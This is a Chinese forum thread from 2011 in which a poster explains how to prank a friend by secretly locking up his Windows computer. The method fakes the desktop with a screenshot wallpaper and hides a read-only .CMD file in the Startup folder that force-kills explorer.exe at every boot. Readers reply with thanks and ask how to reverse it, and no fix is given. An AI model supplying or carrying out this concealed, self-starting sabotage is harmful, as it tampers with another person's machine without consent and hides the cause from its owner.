za1 发表于 2011-11-13 06:07:59

一个封锁电脑的好方法

事情起因:
      一次到别人家里玩,看见他的电脑上安装了不少杀软,上有金山,下有有瑞星,中间还冒个卡巴斯基,夸张死了!!(偶上网可是只有一个360,算是有块遮丑布,没裸奔了)
      问他干啥安装那么多杀毒软件,他白了我一眼:防止中毒呗!
      玩的时候,卡机,卡着不会动了.他说,哎呀,又中毒啦,吗的,&#$%*@!!!装了那么多杀毒软件还是没用.....(装那么多杀毒软件玩,当然卡啦,而且他的电脑又不是什么好的电脑,还不是P4+512内存)
      看来我这个朋友是电脑白痴,哈哈,该整整他了,封锁掉他的电脑!
      下面就是我整人的方法,有兴趣的回复看看!!没兴趣的不勉强,不送啦~
首先.关掉所有的窗口,把不必要的托盘图标(右下角任务栏的图标)隐藏掉.具体怎么隐藏呢?右击任务栏,选择"属性",然后点击左下角的"自定义",要隐藏的就选"总是隐藏"就可以啦.
      接下,按PrintScreen/Sys Rq按钮,就是F12右面的按钮(有的电脑是退格键右面的,因为上面多了一排Power,Sleep,Wake UP按钮,别按了Power喔,否则就关机啦!)
      按了之后,打开画图,按Ctrl+V,黏贴,刚在桌面截的图就弄到上面去了,然后保存在隐秘的地方,建议保存为24位的BMP位图,因为画质不会降低,把它设为背景,
哈哈聪明的人应该知道我要怎么弄了.
      最重要的一步,打开"开始"菜单-所有程序-启动,在里面新建一个记事本,编写以下内容:

@ECHO OFF
taskkill /im explorer.exe /f >nul

哈哈,这是强制结束Explorer的命令,然后把记事本保存为*.CMD的文件,最好把属性改为"只读"和"隐藏",那么破解开机之后再启动里也找不到!!

最后没事等待重启啦!!他开机之后点那个,点这个没反应,哈哈,玩玩可以,适可而止

qizhenwei 发表于 2011-11-13 21:04:07

:)好呵呵谢了啊

zheng150530 发表于 2011-11-13 23:29:38

整人专用内容。。但对方得是大白痴才行啊

foneyang 发表于 2011-11-15 02:20:40

可是无解,若何

年轮掉了 发表于 2011-11-25 11:07:33

怎么破解额??

wdl33 发表于 2021-9-21 17:47:30

非常实用的好方法
感谢
页: [1]
查看完整版本: 一个封锁电脑的好方法